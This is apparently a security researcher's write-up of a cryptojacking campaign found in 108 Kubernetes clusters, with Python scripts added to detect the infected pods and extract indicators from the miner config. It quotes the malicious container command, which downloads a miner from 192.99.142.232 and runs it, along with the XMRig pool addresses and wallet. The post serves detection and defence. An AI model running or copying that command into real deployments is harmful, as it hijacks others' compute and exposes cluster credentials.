Kubernetes systems infected with a cryptominer

The following is appearing in 108 Kubernetes systems that I have tracked so far.

"containers": [
    {
        "command": [
            "sh",
            "-c",
            "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
        ],
        "resources": {},
        "image": "centos",
        "imagePullPolicy": "Always",
        "terminationMessagePath": "/dev/termination-log",
        "volumeMounts": [
            {
                "mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
                "readOnly": true,
                "name": "default-token-gdcjb"
            }
        ],
        "terminationMessagePolicy": "File",
        "name": "myresd4"
    }
]

The Command

The container runs the stock centos image (pulled fresh every time, imagePullPolicy Always) with its entrypoint replaced by the shell one-liner below. It downloads a miner configuration (2.json) and a binary (served as rig, saved as suppoie) from 192.99.142.232:8220 into /var/tmp, marks the binary world-executable with chmod 777, and runs it with that configuration. Note that the spec also mounts the pod's service-account token at /var/run/secrets/kubernetes.io/serviceaccount, so the downloaded binary runs with that credential readable from inside the container.

"command": [
    "sh",
    "-c",
    "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"
]
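The pattern in that command (fetch a payload into a scratch directory, chmod it, execute it) is easy to hunt for across a cluster. The following Python script is an added example, not code from the original gist: it reads the JSON that `kubectl get pods --all-namespaces -o json` prints and flags containers whose entrypoint matches that pattern. The indicator values (host, binary name, base image, token mount path) are copied from the spec above; the regexes, rule names, pod names and the embedded sample pod list are assumptions of this example.

```python
"""Flag the download-and-run miner pattern in a Kubernetes pod listing.

Added example, not code from the original gist. Indicator values are copied
from the observed container spec; the regexes, rule names and the sample
pod list below are assumptions of this example.
"""
import json
import re
import sys

# Indicators copied from the observed container spec.
KNOWN_BAD_HOSTS = {"192.99.142.232"}
KNOWN_BAD_NAMES = {"suppoie"}
SA_TOKEN_PATH = "/var/run/secrets/kubernetes.io/serviceaccount"
# Stock base images that have no business running an ad-hoc shell one-liner.
BASE_IMAGES = {"centos", "ubuntu", "debian", "alpine", "busybox", "fedora"}

DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b[^;&|]*\s-[oO]\b")   # curl -o / wget -O
STAGING_RE = re.compile(r"(?:/var/tmp|/tmp|/dev/shm)/")          # world-writable staging dirs
CHMOD_EXEC_RE = re.compile(r"\bchmod\s+(?:\+x|[0-7]*7[0-7]*)\b")  # chmod +x / chmod 777
RUN_LOCAL_RE = re.compile(r"(?:^|[;&|]\s*)\./\S+")                # ;./something
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def shell_text(container):
    """Join command and args into the string the container runtime executes."""
    return " ".join(container.get("command", []) + container.get("args", []))


def inspect_container(container):
    """Return the list of rules a single container trips (empty if clean)."""
    text = shell_text(container)
    findings = []
    if DOWNLOADER_RE.search(text) and STAGING_RE.search(text):
        findings.append("downloads a payload into a scratch directory")
    if CHMOD_EXEC_RE.search(text) and RUN_LOCAL_RE.search(text):
        findings.append("chmods and then executes a local file")
    bad_hosts = set(IPV4_RE.findall(text)) & KNOWN_BAD_HOSTS
    if bad_hosts:
        findings.append("contacts known miner host " + ", ".join(sorted(bad_hosts)))
    if any(name in text for name in KNOWN_BAD_NAMES):
        findings.append("references known miner binary name")
    # Context that raises severity only when the command itself looked bad.
    image = container.get("image", "").split(":")[0].rsplit("/", 1)[-1]
    if findings and image in BASE_IMAGES:
        findings.append("stock base image %s with an injected entrypoint" % image)
    mounts = [m.get("mountPath", "") for m in container.get("volumeMounts", [])]
    if findings and any(p.startswith(SA_TOKEN_PATH) for p in mounts):
        findings.append("service-account token is mounted where the payload can read it")
    return findings


def scan_pod_list(doc):
    """Scan a kubectl pod list and return one record per suspicious container."""
    hits = []
    for pod in doc.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            findings = inspect_container(c)
            if findings:
                hits.append({"namespace": meta.get("namespace"), "pod": meta.get("name"),
                             "container": c.get("name"), "findings": findings})
    return hits


# Constructed sample: the observed container next to a benign one. Pod names
# and namespaces are made up; the first container spec is the one from the gist.
SAMPLE_POD_LIST = {
    "kind": "List",
    "items": [
        {"metadata": {"name": "myresd4-7f9", "namespace": "default"},
         "spec": {"containers": [{
             "name": "myresd4", "image": "centos", "imagePullPolicy": "Always",
             "command": ["sh", "-c",
                         "curl -o /var/tmp/config.json http://192.99.142.232:8220/2.json;"
                         "curl -o /var/tmp/suppoie http://192.99.142.232:8220/rig;"
                         "chmod 777 /var/tmp/suppoie;cd /var/tmp;./suppoie -c config.json"],
             "volumeMounts": [{"mountPath": SA_TOKEN_PATH, "readOnly": True,
                               "name": "default-token-gdcjb"}]}]}},
        {"metadata": {"name": "web-1", "namespace": "prod"},
         "spec": {"containers": [{"name": "nginx", "image": "nginx:1.25",
                                  "command": ["nginx", "-g", "daemon off;"]}]}},
    ],
}


if __name__ == "__main__":
    # Pass a file saved from `kubectl get pods -A -o json`, or run on the sample.
    doc = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_POD_LIST
    for hit in scan_pod_list(doc):
        print("%(namespace)s/%(pod)s [%(container)s]" % hit)
        for f in hit["findings"]:
            print("  - " + f)
```

The rules are deliberately split into the generic behaviour (download into /tmp-style directory, chmod, run) and the specific indicators from this campaign, so the script still fires when the host or binary name changes. The service-account mount is only reported once a container already looks malicious, because that mount is Kubernetes' default and is not suspicious on its own.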
                     

The JSON miner configuration

The configuration served from http://192.99.142.232:8220/2.json is in XMRig's commented config.json format (the comments mention xmrig.log and link to the XMRig API wiki). It lists three pool servers, all on port 3333 and all paying out to the same wallet address, with a 1% donate level and the miner allowed up to 95% of the CPU:
{
 "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
 "av": 0,                // algorithm variation, 0 auto select
 "background": false,    // true to run the miner in the background
 "colors": true,         // false to disable colored output    
 "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
 "cpu-priority": 5,   // set process priority (0 idle, 2 normal to 5 highest)
 "donate-level": 1,      // donate level, mininum 1%
 "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
 "max-cpu-usage": 95,    // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.  
 "print-time": 60,       // print hashrate report every N seconds
 "retries": 5,           // number of times to retry before switch to backup server
 "retry-pause": 5,       // time to pause between retries
 "safe": false,          // true to safe adjust threads and av settings for current CPU
 "threads": null,        // number of miner threads
 "pools": [
     {
         "url": "158.69.133.20:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "192.99.142.249:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     },
     {
         "url": "202.144.193.110:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",                        // username for mining server
         "pass": "x",                       // password for mining server
         "keepalive": true,                 // send keepalived for prevent timeout (need pool support)
         "nicehash": false                  // enable nicehash/xmrig-proxy support
     }
 ],    
 "api": {
     "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
     "access-token": null,                  // access token for API
     "worker-id": null                      // custom worker-id for API
 }
}
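Because the file carries // comments it is not valid JSON, and a naive json.loads on it fails; cutting each line at the first // is also wrong, since comments and string values can contain quotes and URLs (the log-file and api lines above). The following Python code is an added example, not code from the gist: it strips comments with a string-aware scan, parses the result and pulls out the fields an analyst blocks or hunts on. The embedded sample is a trimmed copy of the 2.json above, and the IOC summary layout is an assumption of this example.

```python
"""Parse an XMRig-style miner config (JSON with // comments) and pull its IOCs.

Added example, not code from the gist. SAMPLE_CONFIG is trimmed from the
observed 2.json; the comment stripper and the summary format are this
example's own assumptions.
"""
import json


def strip_line_comments(text):
    """Drop // comments that sit outside JSON string literals.

    Tracks string and escape state so that "http://..." inside a value
    survives and a quote inside a comment does not start a string.
    """
    out, in_str, escaped, i = [], False, False, 0
    while i < len(text):
        ch = text[i]
        if in_str:
            out.append(ch)
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
            out.append(ch)
        elif text.startswith("//", i):
            nl = text.find("\n", i)          # skip to end of line (or end of text)
            i = len(text) if nl < 0 else nl
            continue
        else:
            out.append(ch)
        i += 1
    return "".join(out)


def parse_miner_config(text):
    """Return the config as a dict; raises ValueError if it is not JSON once stripped."""
    return json.loads(strip_line_comments(text))


def extract_iocs(cfg):
    """Summarise the fields worth blocking or hunting on."""
    pools = cfg.get("pools", [])
    return {
        "algo": cfg.get("algo"),
        "pool_endpoints": [p.get("url") for p in pools],
        "wallets": sorted({p.get("user") for p in pools if p.get("user")}),
        "api_port": cfg.get("api", {}).get("port"),
        "max_cpu_usage": cfg.get("max-cpu-usage"),
    }


# Constructed sample: trimmed from the observed 2.json, comments kept verbatim.
SAMPLE_CONFIG = r'''{
 "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
 "background": false,    // true to run the miner in the background
 "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
 "max-cpu-usage": 95,    // maximum CPU usage for automatic mode
 "pools": [
     {
         "url": "158.69.133.20:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
         "pass": "x",                       // password for mining server
         "keepalive": true
     },
     {
         "url": "192.99.142.249:3333",   // URL of mining server
         "user": "4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg",
         "pass": "x",
         "keepalive": true
     }
 ],
 "api": {
     "port": 0,                             // port for the miner API https://github.com/xmrig/xmrig/wiki/API
     "access-token": null
 }
}'''


if __name__ == "__main__":
    print(json.dumps(extract_iocs(parse_miner_config(SAMPLE_CONFIG)), indent=2))
```

The pool endpoints are what goes into egress blocking or NetFlow searches (port 3333 to those hosts), and the wallet address ties separate samples to the same operator even when the download host changes.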

Thanks

Thanks to the guys at @binaryedgeio for running some worldwide scans for me!
